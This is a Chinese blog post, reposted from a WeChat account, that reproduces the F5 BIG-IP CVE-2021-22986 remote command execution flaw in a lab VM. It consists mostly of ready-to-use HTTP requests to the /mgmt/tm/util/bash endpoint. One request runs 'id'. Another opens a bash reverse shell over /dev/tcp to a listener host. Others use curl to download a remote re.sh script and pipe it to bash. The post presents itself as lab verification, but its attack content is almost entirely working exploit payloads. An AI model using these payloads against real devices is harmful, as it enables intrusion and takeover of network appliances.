F5 BIG-IP CVE-2021-22986 验证及利用

  • A+
所属分类:安全文章

F5 BIG-IP  CVE-2021-22986 验证及利用

环境搭建

测试版本:BIGIP-15.1.0-0.0.31.ALL-vmware

用户密码:root/[email protected]#

网络连接:NAT 模式

如图:

F5 BIG-IP  CVE-2021-22986 验证及利用

netdiscover

F5 BIG-IP  CVE-2021-22986 验证及利用

netstat -antu | grep 443

F5 BIG-IP  CVE-2021-22986 验证及利用

访问

https://192.168.1.137:8443/

F5 BIG-IP  CVE-2021-22986 验证及利用


漏洞验证-命令执行:

POST /mgmt/tm/util/bash HTTP/1.1Host: 192.168.1.137:8443User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0Connection: closeX-F5-Auth-Token:Authorization: Basic YWRtaW46QVNhc1M=Content-Length: 39
{"command":"run","utilCmdArgs":"-c id"}

如图:

F5 BIG-IP  CVE-2021-22986 验证及利用


漏洞利用-反弹shell(bash)

POST /mgmt/tm/util/bash HTTP/1.1Host: 192.168.1.137:8443User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0Connection: closeX-F5-Auth-Token:Authorization: Basic YWRtaW46QVNhc1M=Content-Length: 81
{"command":"run","utilCmdArgs":"-c 'bash -i >&/dev/tcp/192.168.1.128/7777 0>&1'"}

如图:

F5 BIG-IP  CVE-2021-22986 验证及利用


漏洞利用-反弹shell(curl)

思路:远程下载反弹shell的脚本并执行

测试存在curl命令

{"command":"run","utilCmdArgs":"-c 'curl m7bsp1.dnslog.cn' "}

F5 BIG-IP  CVE-2021-22986 验证及利用

re.sh:

F5 BIG-IP  CVE-2021-22986 验证及利用

远程下载re.sh并执行

POST /mgmt/tm/util/bash HTTP/1.1Host: 192.168.1.137:8443User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0Connection: closeX-F5-Auth-Token:Authorization: Basic YWRtaW46QVNhc1M=Content-Length: 81
{"command":"run","utilCmdArgs":"-c 'curl http://192.168.1.128:80/re.sh | bash' "}

如图:

F5 BIG-IP  CVE-2021-22986 验证及利用


若需要该环境,公众号留言:F5。

参考:

https://twitter.com/1ZRR4H/status/1373206181955653632

## (⊙﹏⊙)##

        人活在世界上,不可以有偏差;而且多少要费点劲儿,才能把自己保持到理性的轨道上。  

--王小波 《沉默的大多数》

本文始发于微信公众号(don9sec):F5 BIG-IP CVE-2021-22986 验证及利用

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: